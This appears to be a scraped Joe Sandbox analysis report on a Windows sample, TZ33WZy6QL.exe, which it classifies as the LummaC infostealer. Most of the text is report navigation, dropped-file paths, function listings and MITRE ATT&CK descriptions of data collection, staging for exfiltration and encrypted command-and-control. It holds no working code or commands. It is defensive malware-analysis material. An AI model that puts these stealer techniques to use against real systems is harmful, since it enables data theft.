Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TZ33WZy6QL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TZ33WZy6QL.exe.log

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.0.cs

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.out

C:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP

C:\Users\user\AppData\Local\Temp\RES2A5B.tmp

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
TZ33WZy6QL.exe

Function 0247280C Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 02472818 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02472588 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 02472590 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 024723F0 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 02472679 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 02472680 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 024723F8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 024724C9 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 024724D0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 02472340 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Function 02472348 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre